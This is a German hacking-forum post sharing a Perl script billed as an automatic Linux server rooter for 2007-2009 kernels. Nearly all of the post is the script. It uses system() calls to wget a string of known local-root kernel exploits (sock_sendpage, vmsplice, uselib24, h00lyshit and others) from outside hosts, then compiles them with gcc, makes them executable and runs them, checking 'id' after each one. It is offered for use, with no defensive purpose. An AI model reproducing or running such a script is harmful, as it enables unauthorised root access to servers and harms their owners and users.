Ergebnis 1 bis 8 von 8

Baum-Darstellung

  1. #1
    DateMake Dialer Avatar von lyrix
    Registriert seit
    17.10.2011
    Beiträge
    109

    Standard [perl] Auto Linux Server Rooter

    Original von ABH Sorry für die scheiss Darstellung

    Automatically roots the server for you, stress free. 2007-2009 boxes only.

    Code:
    #!/bin/perl
    # Auto Rooting Linux
    # By xp
    # Local root 2007 2008 2009 for Linux Priv8
    # Usage: perl xp10-Root.pl
    # Version: 1.0 !!!
    # Tout usage des informations diffus es par Metropolis est soumi   autorisation pr alable et express.
    # a violation de ces dispositions imp ratives soumet le contrevenant,
    # et toutes personnes responsables, aux peines p nales et civiles pr vues par la loi fran aise.
    #
    # Info:la commande gcc et wget doit  tre activ e.
    #
    {
    system ( "uname -a" );
    system ( "wget www.tux-planet.fr/public/hack/exploits/kernel/sock-sendpage-local-root-exploit.tar.gz" );
    system ( "tar zxvf sock-sendpage-local-root-exploit.tar.gz" );
    system ( "cd sock-sendpage-local-root-exploit" );
    system ( "chmod 755 wunderbar_emporium.sh" );
    system ( "sh wunderbar_emporium.sh" );
    system ( "id" );
    system ( "cat /proc/sys/vm/mmap_min_addr" );
    print "Please Wait ..." ;
    system ( "wget www.tux-planet.fr/public/hack/exploits/kernel/local-root-exploit-gayros.c" );
    system ( "gcc -o gayros local-root-exploit-gayros.c" );
    system ( "chmod 777 gayros" );
    system ( "./gayros" );
    system ( "id" );
    system ( "wget www.tux-planet.fr/public/hack/exploits/kernel/vmsplice-local-root-exploit.c" );
    system ( "gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.c" );
    system ( "chmod 777 vmsplice-local-root-exploit" );
    system ( "./vmsplice-local-root-exploit" );
    system ( "id" );
    system ( "wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/x2" );
    system ( "chmod 777 x2" );
    system ( "./x2" );
    system ( "id" );
    system ( "wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/x" );
    system ( "chmod 777 x" );
    system ( "./x" );
    system ( "wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/uselib24" );
    system ( "chmod 777 uselib24" );
    system ( "./uselib24" );
    system ( "id" );
    system ( "wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/root2" );
    system ( "chmod 777 root2" );
    system ( "id" );
    system ( "./root2" );
    system ( "wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/kmod2" );
    system ( "chmod 777 kmod2" );
    system ( "./kmod2" );
    system ( "wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/h00lyshit" );
    system ( "chmod 777 h00lyshit" );
    system ( "./h00lyshit" );
    system ( "id" );
    system ( "wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/exp.sh" );
    system ( "chmod 755 exp.sh" );
    system ( "sh exp.sh" );
    system ( "id" );
    system ( "wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/elflbl" );
    system ( "chmod 777 elflbl" );
    system ( "./elflbl" );
    system ( "id" );
    system ( "wget http://rmccurdy.com/scripts/downloaded/localroot/2.6.x/cw7.3" );
    system ( "chmod 777 cw7.3" );
    system ( "./cw7.3" );
    system ( "id" );
    system ( "wget http://rmccurdy.com/scripts/downloaded/localroot/2.4.x/newlocal" );
    system ( "chmod 777 newlocal" );
    system ( "./newlocal" );
    system ( "id" );
    system ( "uname -a" );
    system ( "id;pwd" );
    print "XP" ;
    print "[ w7s7[at]hotmail[dot]com ]" ;
    print "[ XP10.me ]" ;
    }
    Geändert von Dexx (05.11.2011 um 18:49 Uhr)

Ähnliche Themen

  1. Hacker knacken Auto-Software- Tödliche Datenflut im Auto
    Von Dr. XMas im Forum Globale News / Szene News
    Antworten: 15
    Letzter Beitrag: 26.05.2010, 16:46
  2. Port im Rooter freigeben
    Von DayarA im Forum Router, Modems & Co
    Antworten: 4
    Letzter Beitrag: 16.07.2009, 00:40
  3. [b]server von website auto.dl & starten
    Von sTuDi0 im Forum Video-Tutorials
    Antworten: 14
    Letzter Beitrag: 24.04.2009, 19:35
  4. [S]Perl/CGI/PHP/HTML-Server
    Von unna456654 im Forum Sonstige Programmiersprachen
    Antworten: 0
    Letzter Beitrag: 26.01.2009, 14:49
  5. Perl direct SOCKS server's list checker
    Von meckl im Forum Perl
    Antworten: 0
    Letzter Beitrag: 03.02.2008, 10:59

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •